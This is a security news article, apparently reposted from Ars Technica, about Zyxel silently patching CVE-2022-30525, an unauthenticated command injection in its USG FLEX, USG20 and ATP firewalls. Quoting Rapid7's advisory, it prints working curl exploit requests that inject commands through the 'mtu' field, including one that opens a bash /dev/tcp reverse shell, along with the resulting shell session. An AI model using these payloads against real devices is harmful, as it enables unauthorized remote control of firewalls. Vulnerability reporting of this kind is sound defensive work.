{"id":46650,"date":"2022-05-13T15:43:02","date_gmt":"2022-05-13T15:43:02","guid":{"rendered":"https:\/\/packetstormsecurity.com\/news\/view\/33441\/Zyxel-Silently-Patches-Command-Injection-Vulnerability-With-9.8-Severity-Rating.html"},"modified":"2022-05-13T15:43:02","modified_gmt":"2022-05-13T15:43:02","slug":"zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/","title":{"rendered":"Zyxel Silently Patches Command Injection Vulnerability With 9.8 Severity Rating"},"content":{"rendered":"<figure class=\"intro-image intro-left\"> <img decoding=\"async\" src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2022\/05\/zyxel-atp.png\" alt=\"Zyxel silently patches command-injection vulnerability with 9.8 severity rating\"><figcaption class=\"caption\"><\/figcaption><\/figure>\n<aside id=\"social-left\" class=\"social-left\" aria-label=\"Read the comments or share this article\"> <a title=\"17 posters participating, including story author\" class=\"comment-count icon-comment-bubble-down\" href=\"https:\/\/arstechnica.com\/information-technology\/2022\/05\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/?comments=1\"> <\/p>\n<h4 class=\"comment-count-before\">reader comments<\/h4>\n<p> <span class=\"comment-count-number\">31<\/span> <span class=\"visually-hidden\"> with 17 posters participating, including story author<\/span> <\/a> <\/p>\n<div class=\"share-links\">\n<h4>Share this story<\/h4>\n<\/p><\/div>\n<\/aside>\n<p> <!-- cache hit 83:single\/related:8572e8cb70127645658bd446a5f350c5 --><!-- empty --><\/p>\n<p>Hardware manufacturer Zyxel quietly released an update fixing a critical vulnerability that gives hackers the ability to control tens of thousands of firewall devices remotely.<\/p>\n<p>The vulnerability, which allows remote command injection with no authentication required, carries a severity rating of 9.8 out of a possible 10. It\u2019s easy to exploit by sending simple HTTP or HTTPS requests to affected devices. The requests allow hackers to send commands or open a web shell interface that enables hackers to maintain privileged access over time.<\/p>\n<h2>High-value, easy to weaponize, requires no authentication<\/h2>\n<p>The vulnerability affects a line of firewalls that offer a feature known as zero-touch provisioning. Zyxel markets the devices for use in small branch and corporate headquarter deployments. The devices perform VPN connectivity, SSL inspection, web filtering, intrusion protection, and email security and provide up to 5Gbps throughput through the firewall. The Shodan device search service shows more than 16,000 affected devices are exposed to the Internet.<\/p>\n<figure class=\"image shortcode-img center large\"><a href=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2022\/05\/zyxel-firewalls-shodan.png\" class=\"enlarge\" data-height=\"675\" data-width=\"980\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2022\/05\/zyxel-firewalls-shodan-640x441.png\" width=\"640\" height=\"441\" srcset=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2022\/05\/zyxel-firewalls-shodan.png 2x\"><\/a><figcaption class=\"caption\"><\/figcaption><\/figure>\n<p>The specific devices affected are:<\/p>\n<table>\n<thead>\n<tr>\n<th>Affected Model<\/th>\n<th>Affected Firmware Version<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>USG FLEX 100, 100W, 200, 500, 700<\/td>\n<td>ZLD5.00 thru ZLD5.21 Patch 1<\/td>\n<\/tr>\n<tr>\n<td>USG20-VPN, USG20W-VPN<\/td>\n<td>ZLD5.10 thru ZLD5.21 Patch 1<\/td>\n<\/tr>\n<tr>\n<td>ATP 100, 200, 500, 700, 800<\/td>\n<td>ZLD5.10 thru ZLD5.21 Patch 1<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>The vulnerability is tracked as CVE-2022-30525. Rapid7, the security firm that discovered it and privately reported it to Zyxel, said that the VPN series of the devices also supports ZTP, but they\u2019re not vulnerable because they don\u2019t include other required functionality. In an <a href=\"https:\/\/www.rapid7.com\/blog\/post\/2022\/05\/12\/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection\/\">advisory published Thursday<\/a>, Rapid7 researcher Jake Baines wrote:<\/p>\n<aside class=\"ad_wrapper\" aria-label=\"In Content advertisement\"> <span class=\"ad_notice\">Advertisement <\/span> <\/aside>\n<blockquote>\n<p>The affected models are vulnerable to unauthenticated and remote command injection via the administrative HTTP interface. Commands are executed as the <code>nobody<\/code> user. This vulnerability is exploited through the <code>\/ztp\/cgi-bin\/handler<\/code> URI and is the result of passing unsanitized attacker input into the <code>os.system<\/code> method in <code>lib_wan_settings.py<\/code>. The vulnerable functionality is invoked in association with the <code>setWanPortSt<\/code> command. An attacker can inject arbitrary commands into the <code>mtu<\/code> or the <code>data<\/code> parameter.<\/p>\n<\/blockquote>\n<p>Below are examples of (1) <code>curl<\/code> that causes the firewall to execute a <code>ping<\/code>&nbsp;to IP address 192.168.1.220, followed by (2) the powershell output of the results, (3) the spawning of a reverse shell and (4) things a hacker can do with the reverse shell:<\/p>\n<ol>\n<li>\n<ol>\n<li>\n<pre><code>curl -v --insecure -X POST -H \"Content-Type: application\/json\" -d '{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\"\n:\"1\",\"vlanid\":\"5\",\"mtu\":\"; ping 192.168.1.220;\",\"data\":\"hi\"}'\nhttps:\/\/192.168.1.1\/ztp\/cgi-bin\/handler\n<\/code><\/pre>\n<\/li>\n<li>\n<pre><code>nobody 11040 0.0 0.2 21040 5152 ? S Apr10 0:00 \\_ \/usr\/local\/apache\/bin\/httpd -f \/usr\/local\/zyxel-gui\/httpd.conf -k graceful -DSSL\nnobody 16052 56.4 0.6 18104 11224 ? S 06:16 0:02 | \\_ \/usr\/bin\/python \/usr\/local\/zyxel-gui\/htdocs\/ztp\/cgi-bin\/handler.py\nnobody 16055 0.0 0.0 3568 1492 ? S 06:16 0:00 | \\_ sh -c \/usr\/sbin\/sdwan_iface_ipc 11 WAN3 4 ; ping 192.168.1.220; 5 &gt;\/dev\/null 2&gt;&amp;1\nnobody 16057 0.0 0.0 2152 564 ? S 06:16 0:00 | \\_ ping 192.168.1.220\n<\/code><\/pre>\n<\/li>\n<li>\n<pre><code>curl -v --insecure -X POST -H \"Content-Type: application\/json\" -d '\n{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\": \"1\",\"vlanid\":\"5\",\"mtu\":\"; bash -c \\\"exec bash -i &amp;&gt;\/dev\/tcp\/\n192.168.1.220\/1270 &lt;&amp;1;\\\";\",\"data\":\"hi\"}' https:\/\/192.168.1.1\n\/ztp\/cgi-bin\/handler\n<\/code><\/pre>\n<\/li>\n<li>\n<pre><code class=\"language-sh\">albinolobster@ubuntu:~$ nc -lvnp 1270\nListening on 0.0.0.0 1270\nConnection received on 192.168.1.1 37882\nbash: cannot set terminal process group (11037): Inappropriate ioctl for device\nbash: no job control in this shell\nbash-5.1$ id\nid\nuid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)\nbash-5.1$ uname -a\nuname -a\nLinux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU\/Linux\nBash-5.1\n<\/code><\/pre>\n<\/li>\n<\/ol>\n<\/li>\n<\/ol>\n<p>Rapid7 has developed a module for the Metasploit exploit framework <a href=\"https:\/\/github.com\/rapid7\/metasploit-framework\/pull\/16563\">here<\/a> that automates the exploitation process.<\/p>\n<p>Baines said that Rapid7 notified Zyxel of the vulnerability on April 13 and that the two parties agreed to provide a coordinated disclosure, including the fix, on June 21. The researcher went on to say that unbeknownst to Rapid7, the hardware manufacturer released a firmware update on April 28 that quietly fixed the vulnerability. Zyxel only obtained the CVE number on Tuesday, after Rapid7 asked about the silent patch, and published an <a href=\"https:\/\/www.zyxel.com\/support\/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml\">advisory<\/a> on Thursday.<\/p>\n<p><a href=\"https:\/\/attackerkb.com\/topics\/LbcysnvxO2\/cve-2022-30525\/rapid7-analysis\">According to AttackerKB<\/a>, a resource on security vulnerabilities, CVE-2022-30525 is of high value to threat actors because it\u2019s easy to weaponize, requires no authentication, and can be exploited in the default setup of vulnerable devices. Rapid7 representatives weren\u2019t available to answer basic questions about the accuracy of that assessment.<\/p>\n<p>Administrators must manually apply the patch unless they have changed default settings to allow automatic updating. Early indications are that the patch hasn&#8217;t been widely deployed, as a Shodan query for just one of the vulnerable firewalls, the ATP200, showed that only about 25 percent of exposed devices were running the latest firmware.<\/p>\n<p>Vulnerabilities affecting firewalls can be especially severe because they sit at the outer edge of networks where incoming and outgoing traffic flows. Many firewalls can also read data before it\u2019s encrypted. Administrators who oversee networks that use these affected devices should prioritize investigating their exposure to this vulnerability and patch accordingly.<\/p>\n<p> READ MORE <a href=\"https:\/\/packetstormsecurity.com\/news\/view\/33441\/Zyxel-Silently-Patches-Command-Injection-Vulnerability-With-9.8-Severity-Rating.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>READ MORE HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":46651,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[60],"tags":[1011],"class_list":["post-46650","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-packet-storm","tag-headlineflawpatch"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Zyxel Silently Patches Command Injection Vulnerability With 9.8 Severity Rating 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Zyxel Silently Patches Command Injection Vulnerability With 9.8 Severity Rating 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2022-05-13T15:43:02+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2022\/05\/zyxel-atp.png\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Zyxel Silently Patches Command Injection Vulnerability With 9.8 Severity Rating\",\"datePublished\":\"2022-05-13T15:43:02+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/\"},\"wordCount\":610,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/05\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating.png\",\"keywords\":[\"headline,flaw,patch\"],\"articleSection\":[\"Packet Storm\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/\",\"name\":\"Zyxel Silently Patches Command Injection Vulnerability With 9.8 Severity Rating 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/05\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating.png\",\"datePublished\":\"2022-05-13T15:43:02+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/05\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating.png\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/05\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating.png\",\"width\":602,\"height\":246},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"headline,flaw,patch\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/headlineflawpatch\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Zyxel Silently Patches Command Injection Vulnerability With 9.8 Severity Rating\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Zyxel Silently Patches Command Injection Vulnerability With 9.8 Severity Rating 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/","og_locale":"en_US","og_type":"article","og_title":"Zyxel Silently Patches Command Injection Vulnerability With 9.8 Severity Rating 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2022-05-13T15:43:02+00:00","og_image":[{"url":"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2022\/05\/zyxel-atp.png","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Zyxel Silently Patches Command Injection Vulnerability With 9.8 Severity Rating","datePublished":"2022-05-13T15:43:02+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/"},"wordCount":610,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/05\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating.png","keywords":["headline,flaw,patch"],"articleSection":["Packet Storm"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/","url":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/","name":"Zyxel Silently Patches Command Injection Vulnerability With 9.8 Severity Rating 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/05\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating.png","datePublished":"2022-05-13T15:43:02+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/05\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating.png","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/05\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating.png","width":602,"height":246},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/zyxel-silently-patches-command-injection-vulnerability-with-9-8-severity-rating\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"headline,flaw,patch","item":"https:\/\/www.threatshub.org\/blog\/tag\/headlineflawpatch\/"},{"@type":"ListItem","position":3,"name":"Zyxel Silently Patches Command Injection Vulnerability With 9.8 Severity Rating"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/46650","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=46650"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/46650\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/46651"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=46650"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=46650"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=46650"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}